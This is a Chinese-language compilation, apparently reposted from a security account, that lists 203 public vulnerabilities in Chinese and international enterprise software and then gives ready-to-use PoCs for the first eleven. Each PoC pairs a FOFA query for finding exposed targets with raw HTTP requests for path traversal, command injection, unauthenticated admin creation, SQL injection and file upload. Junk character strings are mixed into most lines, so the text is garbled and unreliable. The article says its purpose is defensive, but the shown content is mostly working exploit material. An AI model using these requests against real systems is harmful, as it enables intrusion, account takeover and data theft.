互联网公开漏洞整理202309-202406
* a- ~" I1 r& L3 x1 H) z U道一安全 2024-06-05 07:41 北京4 ~# p+ [+ g2 D% S+ y9 s
以下文章来源于网络安全新视界 ,作者网络安全新视界
1 O8 T( [+ c* h$ V
' r, D* Y+ \* n. e& S: \发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。" D: c+ [* w9 u* C, q! O( b' f
& S: G' l1 [) r C" s漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。5 H9 \2 G+ M' h
" |. L1 p& l! R" o+ g
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
/ P) Q. o& [, `; n( ?! y
# V% _+ k; i$ k3 [4 _+ l ~( m文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。- ~! ^7 e" r: t
0 l3 {7 N/ P# I
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
7 O4 v# {1 K: n2 D; m
3 l, @& B9 C+ A; r$ k1 ]. J7 a- i0 H+ P
声明3 m; x7 @% I) l$ V4 r7 O
% r% @1 `0 u4 H. B b. s为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
; E# l1 S" y( J3 m0 A) ?& o h9 U" W
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
# I: S- d/ U0 {/ V$ {) N& `
: {( ~& x) U9 z e& o
' G. F" J. p$ T
0 c. s. h' R# x% U目录: g7 A y6 S) u' R# M: v
3 D: ~' P% v m6 A! P01
. f, q8 D2 w1 j8 w+ {
/ k) T+ Y; B2 R5 X1. StarRocks MPP数据库未授权访问
: ^0 o5 D8 Z1 ] k" Q5 p* z1 A2. Casdoor系统static任意文件读取
$ Y' n& N1 n X. s0 G1 ]3. EasyCVR智能边缘网关 userlist 信息泄漏
) Q |- O5 D4 d6 \3 f3 z* M4. EasyCVR视频管理平台存在任意用户添加
' W! d/ A& c% q+ L; f3 I5. NUUO NVR 视频存储管理设备远程命令执行
% @+ x2 k4 S2 W% R6. 深信服 NGAF 任意文件读取- Y4 ~- o4 g0 }3 R
7. 鸿运主动安全监控云平台任意文件下载# A& |% Y3 z' `
8. 斐讯 Phicomm 路由器RCE& q/ ^4 ^- u- e1 Q# u
9. 稻壳CMS keyword 未授权SQL注入
) t3 {' h) G7 i" \ K# W10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
9 {/ u$ b# O( @4 ]2 G& o11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
( z0 I! V$ T7 X: a: O- \4 h12. Jorani < 1.0.2 远程命令执行& U- G) h# Q" n$ b$ `
13. 红帆iOffice ioFileDown任意文件读取
8 K9 A" b+ ^6 a4 ~8 {+ [3 g8 n. O14. 华夏ERP(jshERP)敏感信息泄露
k6 H/ c! w: z! d2 Z15. 华夏ERP getAllList信息泄露
3 g5 G& ?% m# p( M0 S16. 红帆HFOffice医微云SQL注入
7 F1 ]! u) V; V' s, i6 G, {17. 大华 DSS itcBulletin SQL 注入
( Y' Q) H& B z/ d% ~# o18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
6 B" Y4 V9 M9 C- n19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
y% {$ U, q, s20. 大华ICC智能物联综合管理平台任意文件读取
; T! a& S0 m: \ p4 {2 K21. 大华ICC智能物联综合管理平台random远程代码执行# ?$ F9 {/ C4 K; ], M# g+ T* n; J9 Q
22. 大华ICC智能物联综合管理平台 log4j远程代码执行" { W( K* r% L8 R. P) m* Z+ J
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行/ y9 {- l; c; z' B0 f& d
24. 用友NC 6.5 accept.jsp任意文件上传8 x( S3 L$ p# g/ S; u
25. 用友NC registerServlet JNDI 远程代码执行5 c4 N V9 _6 v, [
26. 用友NC linkVoucher SQL注入
8 i% S' Q" a4 ~$ t! s+ u+ A27. 用友 NC showcontent SQL注入
6 \" X7 N0 @; m% y( X" @$ E- S( _28. 用友NC grouptemplet 任意文件上传
. |% d5 ? G7 F" r0 [* ?+ Q1 e! F# |29. 用友NC down/bill SQL注入
: `% `$ \% E- i8 \9 P( j30. 用友NC importPml SQL注入
* f: h) f; l: S e- `/ L31. 用友NC runStateServlet SQL注入% B2 Y. L8 ^9 b( r, V3 m: g
32. 用友NC complainbilldetail SQL注入1 m3 I7 _0 p0 }' `. ~6 _
33. 用友NC downTax/download SQL注入, S, j* n5 s7 g% @
34. 用友NC warningDetailInfo接口SQL注入7 N* J4 o6 E, N' `0 s
35. 用友NC-Cloud importhttpscer任意文件上传7 p2 s, Y$ r* }: m& b& z
36. 用友NC-Cloud soapFormat XXE" {. \5 M% K, v) d
37. 用友NC-Cloud IUpdateService XXE- g# ^/ [2 y0 @
38. 用友U8 Cloud smartweb2.RPC.d XXE1 K6 @0 x. L, f- f) }
39. 用友U8 Cloud RegisterServlet SQL注入
6 E5 M/ X; |; m, `: m. u0 t40. 用友U8-Cloud XChangeServlet XXE
$ ?5 S' |; _+ S1 S3 o+ C9 y41. 用友U8 Cloud MeasureQueryByToolAction SQL注入7 Y, l% O+ o, M0 `! l
42. 用友GRP-U8 SmartUpload01 文件上传
8 o1 D' \; T2 Q1 w7 a! }43. 用友GRP-U8 userInfoWeb SQL注入致RCE, Q8 q3 T2 Z7 |" \6 h
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
& V. j2 z$ B7 O! v- y45. 用友GRP-U8 ufgovbank XXE
) O4 `( V, w; d* ?) u9 a46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ @/ r3 ~# ?/ X
47. 用友GRP A++Cloud 政府财务云 任意文件读取
+ b( C) _* B( Z! H48. 用友U8 CRM swfupload 任意文件上传
( x) X- i' S" E. B49. 用友U8 CRM系统uploadfile.php接口任意文件上传, x0 n8 i6 L# V0 z7 P
50. QDocs Smart School 6.4.1 filterRecords SQL注入
5 @) M& w( V4 H" P51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入6 ]4 Y, W2 b! e; V$ p& z7 D# J
52. 泛微E-Office json_common.php sql注入6 D/ X1 J6 j! v8 S' b
53. 迪普 DPTech VPN Service 任意文件上传5 q9 M" X; Q) k9 X
54. 畅捷通T+ getstorewarehousebystore 远程代码执行+ q# W q, t+ z1 M
55. 畅捷通T+ getdecallusers信息泄露
3 e& p: B) w( L2 O" Q; D! T& z56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE+ d/ v+ @& Z8 E& y
57. 畅捷通T+ keyEdit.aspx SQL注入
' }3 t" g# H6 o0 j% X: s58. 畅捷通T+ KeyInfoList.aspx sql注入
; A0 z2 }$ P2 h& S5 c" G5 V# Z59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
# p- Y5 ?1 a! J1 X# q60. 百卓Smart管理平台 importexport.php SQL注入/ s7 [) h3 t: \
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传! `2 ?0 A! \2 I A) B* P
62. IP-guard WebServer 远程命令执行% k# e/ `* m* t9 y0 ?5 a( G1 h2 p2 A
63. IP-guard WebServer任意文件读取
- W" T8 R$ Q" o! D64. 捷诚管理信息系统CWSFinanceCommon SQL注入
6 a6 K' ^& V' O1 \ D65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
# V q$ k) V% R; T- |2 R66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* w' n3 {- R3 t, J
67. 万户ezOFFICE wpsservlet任意文件上传+ J2 ~' [- ^+ W, H, f, e
68. 万户ezOFFICE wf_printnum.jsp SQL注入 M) \, z! s2 E1 r" k& j- N
69. 万户 ezOFFICE contract_gd.jsp SQL注入/ c/ c& n& m1 X% L0 d' P$ e/ u
70. 万户ezEIP success 命令执行
+ P# {7 }2 d0 f7 z71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
E, ~% O2 T% u6 I72. 致远OA getAjaxDataServlet XXE
% l8 @# v# K5 I! F- Y+ [73. GeoServer wms远程代码执行4 |" A0 P3 e9 ~( i& r, Q4 q+ e5 ~
74. 致远M3-server 6_1sp1 反序列化RCE6 N9 e( {( B5 @+ m' h4 ^3 j/ K
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE0 W' S- C* v; Y
76. 新开普掌上校园服务管理平台service.action远程命令执行: q( l4 u% z5 ]1 X" o& p) f
77. F22服装管理软件系统UploadHandler.ashx任意文件上传6 {9 ^8 u+ Y3 @* z- F- `
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) L$ @5 ^4 k4 A0 o4 f* R5 F
79. BYTEVALUE 百为流控路由器远程命令执行
9 L2 e% z' q9 U1 m80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
& x: ?/ f5 D7 J5 x1 W; m/ j81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露* G6 E2 W* j* |' H0 n0 [
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 J0 E0 |! {: E, m1 F! T! _83. JeecgBoot testConnection 远程命令执行
+ a: `4 F; H% `+ u# h+ b( N9 ?84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
* Z O- W" L) ^ f85. SysAid On-premise< 23.3.36远程代码执行* R l4 [) n( `9 C' M9 }
86. 日本tosei自助洗衣机RCE
: e* S$ J8 r: I7 A87. 安恒明御安全网关aaa_local_web_preview文件上传
8 t9 x8 W' q5 G2 Z4 C* d9 ^( V88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
9 E( n- W2 r0 d" ~5 `6 ^2 v2 V89. 致远互联FE协作办公平台editflow_manager存在sql注入( l' u7 Z8 B+ e& Y1 j2 G+ t+ _
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
8 \1 m( h0 ? e91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
. b! @- b9 ?! {5 h- L+ w- V92. 海康威视运行管理中心session命令执行
- Q$ o( i- S0 |' i% J( J; b93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 e# H) s3 @' h) n/ _) k. ^
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
; F* L% X* k/ @9 i95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行. m" I6 p! I& A' h- `1 w( R$ u
96. Apache OFBiz 18.12.11 groovy 远程代码执行
/ }6 ]: n5 A" _. Q, D97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
! J0 u6 K, e J5 |98. SpiderFlow爬虫平台远程命令执行
( a3 \5 R$ ~+ D99. Ncast盈可视高清智能录播系统busiFacade RCE8 F9 G0 m5 ~ y
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
. A; i+ R8 w# ]. a+ O" Y101. ivanti policy secure-22.6命令注入! K4 e k. j( U1 y% Q! D
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& o2 L6 g# T9 D% h/ ?# r
103. Ivanti Pulse Connect Secure VPN XXE) T. t& W. ~$ Y l% n9 S
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
- P) k {& y1 E8 B8 x: h4 i# s5 ]( a! F; v105. SpringBlade v3.2.0 export-user SQL 注入
% i. A' f: p5 f# @+ e! a6 {+ u4 s- R106. SpringBlade dict-biz/list SQL 注入4 B6 t9 |/ o1 p, M& G
107. SpringBlade tenant/list SQL 注入 {% }3 P" e$ i* K i* w5 D
108. D-Tale 3.9.0 SSRF, O" n8 e* f, b" R8 n% H4 L- a3 D! v2 _
109. Jenkins CLI 任意文件读取4 K1 t/ }+ ~* |6 J1 E6 L6 E7 h& V
110. Goanywhere MFT 未授权创建管理员
% C0 K( o- l$ q111. WordPress Plugin HTML5 Video Player SQL注入
+ q" z* ^* E3 \" k112. WordPress Plugin NotificationX SQL 注入
0 D/ q ^* Q* U. T8 S* s$ i113. WordPress Automatic 插件任意文件下载和SSRF$ S0 H9 r7 m& p) y, D
114. WordPress MasterStudy LMS插件 SQL注入0 k/ d* Y' [9 e+ x! Q, @
115. WordPress Bricks Builder <= 1.9.6 RCE) p; t& b8 r' Z& j, {# H
116. wordpress js-support-ticket文件上传
, z3 L8 ~( S% H0 H" i117. WordPress LayerSlider插件SQL注入0 M1 D/ w* V( S
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
W2 ^3 \( f- m! ~% T$ F0 f119. 北京百绰智能S20后台sysmanageajax.php sql注入
' L6 o" |9 F) ^3 ~120. 北京百绰智能S40管理平台导入web.php任意文件上传
( ^ l& k$ Z; k$ |: C& e121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 F: U0 E$ v2 z3 t; X
122. 北京百绰智能s200管理平台/importexport.php sql注入
1 _3 Z4 L x" k+ M123. Atlassian Confluence 模板注入代码执行2 h$ E, ~8 g8 l- {, @0 i( u
124. 湖南建研工程质量检测系统任意文件上传
1 ]8 O4 z6 O+ e" Q! B- i9 O9 d125. ConnectWise ScreenConnect身份验证绕过
0 N5 A+ z" y7 K126. Aiohttp 路径遍历$ t, R) d' \0 s. {% `8 U
127. 广联达Linkworks DataExchange.ashx XXE
g/ P/ N4 R9 ~* m* a" ~# ^, W128. Adobe ColdFusion 反序列化
. n0 }1 q- ]3 X; `$ `129. Adobe ColdFusion 任意文件读取
. Q8 S* F, u/ p, ~. \' d130. Laykefu客服系统任意文件上传2 C* t2 [. Y; l e2 \' S; Z
131. Mini-Tmall <=20231017 SQL注入1 s9 [$ f5 I& }8 f
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
/ F8 A: m# Y/ d5 L) _5 D2 H133. H5 云商城 file.php 文件上传
/ O4 C4 j4 i o134. 网康NS-ASG应用安全网关index.php sql注入! l3 R: a6 B7 a
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
1 l! ^ C, D' C, Z1 y136. NextChat cors SSRF
# N+ r5 S" z: A& O+ M137. 福建科立迅通信指挥调度平台down_file.php sql注入2 ?9 H( f. `" C8 ?: ?& P. ]1 M+ k
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入) c! r, q" |" @: e3 Z/ Z
139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ u4 k& A9 n U; k
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
/ o" o0 E% n* B1 M" @' W141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
+ Q6 V+ X D9 M' ~142. CMSV6车辆监控平台系统中存在弱密码6 O5 y3 h% v( G* A0 V
143. Netis WF2780 v2.1.40144 远程命令执行
8 s: L. q& h1 Y1 [144. D-Link nas_sharing.cgi 命令注入
2 d) o( |, ^. B* W: A9 W145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
1 O+ W- @% G4 W146. MajorDoMo thumb.php 未授权远程代码执行
4 k0 |) {6 i! [5 G* ?/ I147. RaidenMAILD邮件服务器v.4.9.4-路径遍历7 b& j, y- ~* j6 ~
148. CrushFTP 认证绕过模板注入
, d# g) Y1 v: ?149. AJ-Report开源数据大屏存在远程命令执行; m/ K4 U+ y. ^+ l. K
150. AJ-Report 1.4.0 认证绕过与远程代码执行
7 j4 C9 S$ u+ o/ ^) u5 ^151. AJ-Report 1.4.1 pageList sql注入
8 l+ S ?& ~* ?; [152. Progress Kemp LoadMaster 远程命令执行' f, \, m5 c# o4 ^ r
153. gradio任意文件读取. R. T- \% p# `4 K- a1 z+ L
154. 天维尔消防救援作战调度平台 SQL注入
) f3 }+ x z5 P8 [ K5 u155. 六零导航页 file.php 任意文件上传! H) B5 ]' I9 l/ w# ~: k7 i
156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 [, c! u" ^, a2 X157. 美特CRM upload.jsp 任意文件上传* B5 h B2 v2 C* @# Q
158. Mura-CMS-processAsyncObject存在SQL注入5 P* h) ^3 W2 t: a
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传" N1 W4 C( A' s7 a" o
160. Sonatype Nexus Repository 3目录遍历与文件读取5 w1 l; e2 I9 f
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传 ?+ B" ]2 v2 O4 d
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
* m8 K+ z# ^2 [. C# r# R5 C7 z163. 号卡极团分销管理系统 ue_serve.php 任意文件上传 G; r( P2 @+ i# r0 \( s% h
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
: w1 e% C7 V: F" J4 e2 e165. OrangeHRM 3.3.3 SQL 注入
0 @5 E" j- R2 O* s1 x166. 中成科信票务管理平台SeatMapHandler SQL注入
( R$ |, T; ^4 n" p$ O167. 精益价值管理系统 DownLoad.aspx任意文件读取
) g- B2 e L4 K/ s7 j168. 宏景EHR OutputCode 任意文件读取" q4 z8 X) m8 n' f
169. 宏景EHR downlawbase SQL注入
% T$ q3 V# m8 S. ^7 Y* {; a( \170. 宏景EHR DisplayExcelCustomReport 任意文件读取
4 [5 ]1 k; ^5 H7 z171. 通天星CMSV6车载定位监控平台 SQL注入
1 e h" Y( V8 C: Z, g3 g6 {# ]7 Q172. DT-高清车牌识别摄像机任意文件读取
. q! N5 Z! ]4 L173. Check Point 安全网关任意文件读取
; d& E4 X0 n& G/ r5 _" k- d M9 S174. 金和OA C6 FileDownLoad.aspx 任意文件读取
2 r( ]5 E" z; ~1 G& Z175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入8 O, G c$ J% N" [8 ?4 n
176. 电信网关配置管理系统 rewrite.php 文件上传
" u7 F( A9 J' t) h$ [/ l177. H3C路由器敏感信息泄露9 c# V; x; i. o4 V+ T+ _1 y: N
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
% v) Y( K& V: j1 m% U) V8 @1 s179. 建文工程管理系统存在任意文件读取 z1 X8 }1 g% n9 S ? R
180. 帮管客 CRM jiliyu SQL注入
6 i D% b8 X7 E181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入4 v0 S, m3 w% Q' L
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建- v f1 U9 `4 j3 j8 m! W
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入; |. q3 G5 u9 Q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
! x+ s8 \5 O. Z* Q4 w7 f% b! N0 x1 l185. 瑞友天翼应用虚拟化系统SQL注入
( I0 J' S; D8 J5 w) s186. F-logic DataCube3 SQL注入
; J1 G( @' M6 c) a1 u+ k9 n187. Mura CMS processAsyncObject SQL注入4 b. h% g# f$ E
188. 叁体-佳会视频会议 attachment 任意文件读取
& R0 L5 i$ }5 q. ]189. 蓝网科技临床浏览系统 deleteStudy SQL注入
+ x: N. {" q9 E3 _$ O# L190. 短视频矩阵营销系统 poihuoqu 任意文件读取) p: g/ U9 m, H4 {
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
' l* L/ L: k0 k' w( R192. 富通天下外贸ERP UploadEmailAttr 任意文件上传* f+ M W. M) a" |" V. j
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行" _/ h3 @8 {+ I9 O% b8 U
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
! U/ q. R) ?* a4 B195. 飞鱼星上网行为管理系统 send_order.cgi命令执行! w( y2 ~6 V) v" U+ b9 h: G
196. 河南省风速科技统一认证平台密码重置" h2 b$ Y; A& u
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入) a, [% i7 x1 W+ q
198. 阿里云盘 WebDAV 命令注入; X* |. n5 b3 y
199. cockpit系统assetsmanager_upload接口 文件上传
6 E8 q/ w# u0 L& X) z200. SeaCMS海洋影视管理系统dmku SQL注入
3 t7 W9 V3 o. A1 s' F. P, r& B! o201. 方正全媒体新闻采编系统 binary SQL注入
9 _, F" M4 ^( J# L# s) s! @202. 微擎系统 AccountEdit任意文件上传
% r% {( [ g/ d: e+ L: N& g: \6 r203. 红海云EHR PtFjk 文件上传
3 X0 }# {* n+ q# I6 b i
( \0 {; o) a8 Z# E! _$ q6 L0 z' fPOC列表
: p9 m, ^; Q8 D( B( W3 R
' O6 g+ i$ T$ }8 ^6 Z02
9 @: T$ x* G2 Z! X2 ]; w) Y b' h. V4 X; H5 }
1. StarRocks MPP数据库未授权访问4 d" ^6 v2 Q; H# k
FOFA :title="StarRocks"7 _8 C- [6 E. L- w+ j2 R
GET /mem_tracker HTTP/1.1/ Z" ~# ]1 i# D" H+ C5 U
Host: URL
# ^7 g# J) p) K, e$ H
: j# v# N# C8 _" b8 j: X4 A1 S$ T: ^5 v/ B
2. Casdoor系统static任意文件读取3 `( d) o8 Y+ E |+ e/ g3 f
FOFA :title="Casdoor"
" t$ R1 g6 f' y! n3 ~) jGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
- j L4 o$ H( E0 f5 J7 Z+ b* x- PHost: xx.xx.xx.xx:9999
# H" K0 I' O' `1 {4 R$ RUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
% V f" O) n- Z6 h2 C3 RConnection: close& P$ z$ |$ }3 q. d1 s- R
Accept: */** N- C4 E! k* t6 f
Accept-Language: en
* J3 f, G r) q+ i4 V5 V( DAccept-Encoding: gzip; i4 k4 q9 {, z; O3 \
. N7 i8 Q' ?( O! I: s) k9 P( P! v
. i7 N" t% F9 A; _) ]; C8 }
3. EasyCVR智能边缘网关 userlist 信息泄漏3 L2 r- Q; X' ]6 h$ A6 v
FOFA :title="EasyCVR"$ f. B/ l0 H4 i8 B3 A
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
& w+ f) b9 L8 \& \+ aHost: xx.xx.xx.xx
1 ?# m2 A* X. \5 G6 A; Y
! c" P& Q5 E5 l, k! e1 t a6 @9 Z8 p5 \& g
4. EasyCVR视频管理平台存在任意用户添加
! r# J; w$ w0 a- FFOFA :title="EasyCVR"( q- D* n$ {' y- P7 L- s/ E
$ c- Q6 }7 v+ h. K
password更改为自己的密码md59 M: Z8 s1 b6 {. \5 r% s
POST /api/v1/adduser HTTP/1.1
! J0 @; j% ?( u' sHost: your-ip
1 ^. o) t/ _, U* {/ f" l& {4 fContent-Type: application/x-www-form-urlencoded; charset=UTF-83 U$ q/ \+ P# G3 e
7 f: y, A. j' E8 S
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=18 k' F" T$ v6 }# h1 k7 ^
8 Y4 A. w2 K. [! O! c& R# Z N( _' i6 e' }" ?- B/ U
5. NUUO NVR 视频存储管理设备远程命令执行
4 i; P o7 `4 k6 N: M1 YFOFA:title="Network Video Recorder Login"
5 ?5 }) ~* P# O' V- r" c7 U0 u& oGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
: c4 c# X2 H3 J4 b% qHost: xx.xx.xx.xx
6 P& h9 Z" O# T i9 M3 ^1 T5 N& |. o
# ~7 E q% Y: y! G$ g _6 X8 F
' d2 r7 [! A* _6. 深信服 NGAF 任意文件读取; r1 C! t0 n6 C0 B, B
FOFA:title="SANGFOR | NGAF"3 O- H' w1 K4 _ t6 i9 y4 T
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
4 z0 {4 K5 S9 ^& h v% W1 h9 m- `' THost:/ i" \7 O0 Q% g' j# w2 _* q- Z. U
% D" ^. x0 s8 M" o0 B* f
' q* z' b5 W8 a6 a" Y7. 鸿运主动安全监控云平台任意文件下载0 S H; ~! O9 E- f( `5 @. w B% R
FOFA:body="./open/webApi.html"$ t! m4 w5 j7 L# k& e* z( ~- U& }& u
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
8 C- ^3 B0 H) G# ~2 cHost:
; a! F4 O( @9 E. r$ I0 t) Y/ e' W4 Q* }6 Y& A
* \$ V, x8 v" J: t8. 斐讯 Phicomm 路由器RCE
# t1 t, _) h8 G& [- EFOFA:icon_hash="-1344736688"
8 O' o3 t; y0 p0 U# O默认账号admin登录后台后,执行操作: O% Z( Z# S! v1 u a
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
* J# D3 [& m7 m, P PHost: x.x.x.x
: @2 Z0 i2 x) X9 OCookie: sysauth=第一步登录获取的cookie
) F* F5 L- G7 t7 `; G' RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz) j v- H7 ~- D! U& X
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36* F6 _! p4 Y. m0 `
9 ]7 t/ T+ w% Y/ D3 n
------WebKitFormBoundaryxbgjoytz, o+ _# \# I% g, T b
Content-Disposition: form-data; name="wifiRebootEnablestatus"
+ Q ^, y3 _5 |; y6 B; |0 c) n* x8 V% c; q$ }+ h& Z* R/ h
%s/ D/ V6 b- s& W: M' k
------WebKitFormBoundaryxbgjoytz
" a3 w+ F* K4 {Content-Disposition: form-data; name="wifiRebootrange"
8 \% j9 n6 o. F. K
; `. v1 |) } S% D12:00; id;
0 M; G; B3 A1 d o& ~. Q------WebKitFormBoundaryxbgjoytz5 H: S" D- n& U8 b5 \. r$ s$ X5 @
Content-Disposition: form-data; name="wifiRebootendrange"
7 L$ U( ^/ ^; y( c8 H5 X, v! g4 W1 d" v) N4 ]/ A7 F' H3 G
%s:
0 W$ T3 V/ c5 [! e0 K, r------WebKitFormBoundaryxbgjoytz. J7 P5 e* F0 {$ D8 L/ s
Content-Disposition: form-data; name="cururl2"
7 ?; p: e' L# V( u1 b/ b3 S3 h! Y5 h S! i8 q/ H q/ \
7 ^. _6 \2 a/ a2 x* j------WebKitFormBoundaryxbgjoytz--
! i) n0 C& S9 C* Y) M6 `& J0 z4 b& Z( T7 I
4 T# Q/ Y6 |$ D/ h0 u% K% _# W9. 稻壳CMS keyword 未授权SQL注入
/ s0 }# N. `9 f; t! l: W3 n/ xFOFA:app="Doccms"
- |* ^7 p( Y5 SGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.16 i' d: Q$ ~! t
Host: x.x.x.x; q) w) u0 b, P
: {0 Z5 d N+ l8 G" l3 w9 c
9 Y7 m- U L0 E' opayload为下列语句的二次Url编码
! K8 W& B0 T/ t+ D% t* S# u
- ^1 b% ?" \1 R# Q& {2 ]: R) E' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#3 T" n; u3 D( H; D) E
/ B! D' Q% k% S5 d# z# g3 W8 X% ~5 t
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" r) Y5 a% _, t8 \$ v% CFOFA:icon_hash="953405444"
" \, j3 I$ k& ]% U# u3 f. |3 U! n' y8 f- a: [7 E: ^
文件上传后响应中包含上传文件的路径; S6 l* {6 l2 T3 [- v- O1 B& @
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
. {) D* j/ V( l+ a, rHost: x.x.x.x:xx, f! A+ Q, R$ U& o9 u: j* K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% d9 ~( H4 M D9 J: HContent-Length: 197
! g% U1 }7 N5 ~2 k+ T* F7 m, ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 K. e r# h, f
Accept-Encoding: gzip, deflate6 d9 `$ O- d( a
Accept-Language: zh-CN,zh;q=0.9
8 X: J+ l7 w$ i9 \0 X8 @5 }8 cConnection: close3 Q4 l0 B+ `% I+ H; N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
' b" m4 m% f1 }0 w1 V& }7 }2 R7 c1 a7 v; ~, u( {
------WebKitFormBoundaryxdgaqmqu- U/ p2 M5 ^. a2 f7 y( t
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
3 Q* x* p7 k4 F7 _! O' }0 {Content-Type: text/html7 S6 Q5 H. q% v( |) P* J
# N0 F9 O; H7 |. b9 qjmnqjfdsupxgfidopeixbgsxbf
4 B2 ~) U4 X0 {2 Q------WebKitFormBoundaryxdgaqmqu--9 R4 H( }1 T: W
$ Y& D6 l" v7 [0 e
$ {! Z/ I1 l" ]11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入% ]+ N1 e( m: X1 K, L' K
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 I- a* W: a. W) H EGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.11 A2 S/ ?9 B. X4 A+ {
Host: 127.0.0.1
: w% P& N* [$ y% E$ Y& CPragma: no-cache' y2 m* n3 w9 s9 ~# B- k8 I
Cache-Control: no-cache
